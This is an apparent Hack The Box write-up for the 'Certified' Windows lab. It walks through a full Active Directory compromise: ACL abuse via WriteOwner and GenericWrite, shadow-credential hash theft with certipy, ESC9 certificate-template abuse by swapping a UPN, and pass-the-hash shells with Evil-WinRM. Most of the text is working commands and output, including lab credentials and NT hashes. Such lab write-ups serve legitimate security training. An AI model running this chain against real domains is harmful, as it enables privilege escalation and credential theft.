HTB | Certified

Machine - https://app.hackthebox.com/machines/Certified

Machine Information - As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09

NMAP

└─$ nmap -sC -sV -p 53,88,135,139,389,445,464,3268,3269,5985,9389,49667,49689,49690,49691,49720,49741,49776 10.10.11.41 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-09 12:54 IST
Nmap scan report for 10.10.11.41
Host is up (0.59s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-09 14:24:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
|_ssl-date: 2025-08-09T14:26:35+00:00; +7h00m04s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
|_ssl-date: 2025-08-09T14:26:35+00:00; +7h00m04s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-09T14:26:33+00:00; +7h00m03s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
49741/tcp open  msrpc         Microsoft Windows RPC
49776/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-08-09T14:25:57
|_  start_date: N/A
|_clock-skew: mean: 7h00m03s, deviation: 0s, median: 7h00m03s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 126.55 seconds

SMB

We do not have permission to view any interesting shares

└─$ netexec smb certified.htb -u judith.mader -p judith09 --shares
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.41     445    DC01             [+] certified.htb\\judith.mader:judith09 
SMB         10.10.11.41     445    DC01             [*] Enumerated shares
SMB         10.10.11.41     445    DC01             Share           Permissions     Remark
SMB         10.10.11.41     445    DC01             -----           -----------     ------
SMB         10.10.11.41     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.41     445    DC01             C$                              Default share
SMB         10.10.11.41     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.41     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.41     445    DC01             SYSVOL          READ            Logon server share 

We can get the user list

└─$ netexec smb certified.htb -u judith.mader -p judith09 --users 
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.41     445    DC01             [+] certified.htb\\judith.mader:judith09 
SMB         10.10.11.41     445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.10.11.41     445    DC01             Administrator                 2024-05-13 14:53:16 0       Built-in account for administering the computer/domain 
SMB         10.10.11.41     445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.10.11.41     445    DC01             krbtgt                        2024-05-13 15:02:51 0       Key Distribution Center Service Account 
SMB         10.10.11.41     445    DC01             judith.mader                  2024-05-14 19:22:11 0        
SMB         10.10.11.41     445    DC01             management_svc                2024-05-13 15:30:51 0        
SMB         10.10.11.41     445    DC01             ca_operator                   2024-05-13 15:32:03 0        
SMB         10.10.11.41     445    DC01             alexander.huges               2024-05-14 16:39:08 0        
SMB         10.10.11.41     445    DC01             harry.wilson                  2024-05-14 16:39:37 0        
SMB         10.10.11.41     445    DC01             gregory.cameron               2024-05-14 16:40:05 0        
SMB         10.10.11.41     445    DC01             [*] Enumerated 9 local users: CERTIFIED

Bloodhound

└─$ bloodhound-python -u 'judith.mader' -p 'judith09' -d certified.htb -ns 10.10.11.41 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 01M 21S
INFO: Compressing output into 20250809202730_bloodhound.zip

Foothold/shell

Shell as management_svc

WriteOwner

On analysing the Bloodhound result, we know:

JUDITH.MADER@CERTIFIED.HTB -> WriteOwner -> MANAGEMENT@CERTIFIED.HTB

and MANAGEMENT_SVC@CERTIFIED.HTB -> MemberOf -> MANAGEMENT@CERTIFIED.HTB

So we will set JUDITH.MADER@CERTIFIED.HTB as the group owner of MANAGEMENT@CERTIFIED.HTB

└─$ bloodyAD --host 10.10.11.41 -d certified.htb -u 'judith.mader' -p 'judith09' set owner management  judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on management

Next, I need to give judith.mader the full control over the groups:

└─$ impacket-dacledit -action write -rights FullControl -target 'management' -principal 'judith.mader' certified.htb/'judith.mader':'judith09' -dc-ip 10.10.11.41
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250809-210119.bak
[*] DACL modified successfully!

Let’s add ourselves

└─$ bloodyAD --host 10.10.11.41 -d certified.htb -u 'judith.mader' -p 'judith09' add groupMember management 'judith.mader'                                       
[+] judith.mader added to management

GenericWrite

Since Management have GenericWrite over Management_svc we can either use Targeted Kerberos or shadow credentials

We will be doing Shadow Credential to get the hash

└─$ certipy shadow auto -account 'management_svc' -u 'judith.mader@certified.htb' -p 'judith09' -dc-ip 10.10.11.41
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'cae378b3cb274386b4a26c37f2b62448'
[*] Adding Key Credential with device ID 'cae378b3cb274386b4a26c37f2b62448' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID 'cae378b3cb274386b4a26c37f2b62448' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'management_svc@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'management_svc.ccache'
[*] Wrote credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

Since Management_svc is a Member Of Remote Management Users we can winrm

and we are in and got the user.txt

└─$ evil-winrm -i 10.10.11.41 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\management_svc\\Documents> dir ..\\Desktop

    Directory: C:\\Users\\management_svc\\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         8/9/2025   7:13 AM             34 user.txt

Privilege Escalation

GenericAll

Now we can use shadow credentials to get the hash for the CA_operator

└─$ certipy shadow auto -account ca_operator -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip 10.10.11.41
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '4b220ea59d294026bcc588810decf172'
[*] Adding Key Credential with device ID '4b220ea59d294026bcc588810decf172' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '4b220ea59d294026bcc588810decf172' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca_operator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_operator.ccache'
[*] Wrote credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2

ESC 9

we found ESC9

└─$ certipy find -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -target 10.10.11.41 -text -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : certified-DC01-CA
    DNS Name                            : DC01.certified.htb
    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start          : 2024-05-13 15:33:41+00:00
    Certificate Validity End            : 2124-05-13 15:43:41+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CERTIFIED.HTB\\Administrators
      Access Rights
        ManageCa                        : CERTIFIED.HTB\\Administrators
                                          CERTIFIED.HTB\\Domain Admins
                                          CERTIFIED.HTB\\Enterprise Admins
        ManageCertificates              : CERTIFIED.HTB\\Administrators
                                          CERTIFIED.HTB\\Domain Admins
                                          CERTIFIED.HTB\\Enterprise Admins
        Enroll                          : CERTIFIED.HTB\\Authenticated Users
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : PublishToDs
                                          AutoEnrollment
                                          NoSecurityExtension
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-05-13T15:48:52+00:00
    Template Last Modified              : 2024-05-13T15:55:20+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\\operator ca
                                          CERTIFIED.HTB\\Domain Admins
                                          CERTIFIED.HTB\\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\\Administrator
        Full Control Principals         : CERTIFIED.HTB\\Domain Admins
                                          CERTIFIED.HTB\\Enterprise Admins
        Write Owner Principals          : CERTIFIED.HTB\\Domain Admins
                                          CERTIFIED.HTB\\Enterprise Admins
        Write Dacl Principals           : CERTIFIED.HTB\\Domain Admins
                                          CERTIFIED.HTB\\Enterprise Admins
        Write Property Enroll           : CERTIFIED.HTB\\Domain Admins
                                          CERTIFIED.HTB\\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFIED.HTB\\operator ca
    [!] Vulnerabilities
      ESC9                              : Template has no security extension.
    [*] Remarks
      ESC9                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

ESC9 vulnerabilities arise when a certificate template is explicitly configured not to include the szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2) security extension in the certificates it issues. This extension, which contains the requester's SID, was introduced by Microsoft as part of the May 2022 "Certifried" updates (CVE-2022-26923 and KB5014754) to enable "strong certificate mapping". Strong mapping allows DCs to reliably and securely map a presented client certificate to a specific user or computer account in Active Directory using its SID.

ESC9 can be exploited in a couple of primary ways:

1. With UPN Manipulation (in Compatibility Mode or Disabled Mode)

2. Combined with ESC6 (CA allows SAN specification)

We will use 1st method

Step 1: Read initial UPN of the victim account (Optional - for restoration).

└─$ certipy account -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip '10.10.11.41' -user 'Administrator'  read 
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Reading attributes for 'Administrator':
    cn                                  : Administrator
    distinguishedName                   : CN=Administrator,CN=Users,DC=certified,DC=htb
    name                                : Administrator
    objectSid                           : S-1-5-21-729746778-2675978091-3820388244-500
    sAMAccountName                      : Administrator
    userAccountControl                  : 66048
    whenCreated                         : 2024-05-13T15:02:18+00:00
    whenChanged                         : 2025-08-09T14:13:08+00:00

Step 2: Update the victim account's UPN to the target administrator's sAMAccountName.

Since management_svc had GenericAll over ca_operator, which means full control over that AD object. That includes the ability to Change userPrincipalName

└─$ certipy account -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip '10.10.11.41' -upn 'administrator' -user 'ca_operator' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_operator'

Step 3: Request a certificate as the "victim" user from the ESC9 template.

└─$ certipy req -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip '10.10.11.41' -ca 'certified-DC01-CA' -template 'CertifiedAuthentication'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 6
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Step 4: Revert the "victim" account's UPN

└─$ certipy account -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip '10.10.11.41' -upn 'ca_operator' -user 'ca_operator' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operator
[*] Successfully updated 'ca_operator'

Step 5: Authenticate as the target administrator.

└─$ certipy auth  -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

Now i can winrm via hash and get the root.txt

└─$ evil-winrm -i certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> dir ..\\Desktop

    Directory: C:\\Users\\Administrator\\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         8/9/2025   7:13 AM             34 root.txt